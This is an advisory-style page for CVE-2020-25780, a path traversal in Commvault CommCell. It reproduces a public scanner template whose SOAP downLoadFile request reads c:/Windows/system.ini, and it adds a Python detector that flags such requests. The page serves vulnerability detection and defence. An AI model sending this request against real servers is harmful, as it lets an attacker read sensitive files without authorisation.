CVE-2020-25780: Commvault CommCell - Local File Inclusion

Date: 2025-08-01 | Affected software: Commvault CommCell | PoC: public

Vulnerability description

CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 is vulnerable to local file inclusion because an attacker who can view a log file can instead view a file outside of the log-files folder.

PoC code [public]

id: CVE-2020-25780

info:
  name: Commvault CommCell - Local File Inclusion
  author: pdteam
  severity: high
  description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.
  reference:
    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
    - http://kb.commvault.com/article/63264
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25780
    cwe-id: CWE-22
    epss-score: 0.41514
    epss-percentile: 0.97328
    cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: commvault
    product: commcell
  tags: cve,cve2020,commvault,lfi

http:
  - method: POST
    path:
      - "{{BaseURL}}/SearchSvc/CVSearchService.svc"

    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
         <soapenv:Header/>
         <soapenv:Body>
            <tem:downLoadFile>
               <tem:path>c:/Windows/system.ini</tem:path>
            </tem:downLoadFile>
         </soapenv:Body>
      </soapenv:Envelope>

    headers:
      Cookie: Login
      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
      content-type: text/xml

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "downLoadFileResult"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100deceea6a6b6db0c19a032d98a7e0a5f5b6aaf8b5b208bb1f5f692d5314e19edb022060ff1910ea5625c743580d2f582153ae3df26926c404b955f16b28f01c7f180b:922c64590222798bb761d5b6d8e72950
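
A defensive counterpart to the request above, as an added example that is not part of the original page or the template project: it parses a captured downLoadFile SOAP request and flags a path that resolves outside the log-files folder. LOG_DIR is a placeholder (the page does not give the real folder) and the function names are hypothetical.

```python
import ntpath
import xml.etree.ElementTree as ET

# Assumption: placeholder log-files folder; the page does not state the real path.
LOG_DIR = r"C:\EXAMPLE\Log Files"
ACTION = "http://tempuri.org/ICVSearchSvc/downLoadFile"
NS = {"soapenv": "http://schemas.xmlsoap.org/soap/envelope/",
      "tem": "http://tempuri.org/"}

# Constructed sample: the request body the template above sends.
SAMPLE_BODY = """<soapenv:Envelope
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
 <soapenv:Header/>
 <soapenv:Body>
  <tem:downLoadFile><tem:path>c:/Windows/system.ini</tem:path></tem:downLoadFile>
 </soapenv:Body>
</soapenv:Envelope>"""


def requested_path(headers, body):
    """Return tem:path of a downLoadFile SOAP call, or None for other requests."""
    lowered = {k.lower(): v for k, v in headers.items()}
    if lowered.get("soapaction", "").strip().strip('"') != ACTION:
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("./soapenv:Body/tem:downLoadFile/tem:path", NS)
    return node.text.strip() if node is not None and node.text else None


def outside_log_dir(path, log_dir=LOG_DIR):
    """True when path does not resolve to a location under log_dir (CWE-22)."""
    if not ntpath.isabs(path):  # relative names resolve against the log folder
        path = ntpath.join(log_dir, path)
    base = ntpath.normcase(ntpath.normpath(log_dir))
    target = ntpath.normcase(ntpath.normpath(path))
    try:
        return ntpath.commonpath([base, target]) != base
    except ValueError:  # different drive or UNC share
        return True


def is_traversal_attempt(headers, body):
    """Flag downLoadFile calls whose path escapes the log-files folder."""
    path = requested_path(headers, body)
    return path is not None and outside_log_dir(path)
```

The same containment test (normalize first, then compare against the allowed base) is the server-side check this bug class calls for; comparing raw strings before normalization misses `..` segments and mixed separators.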
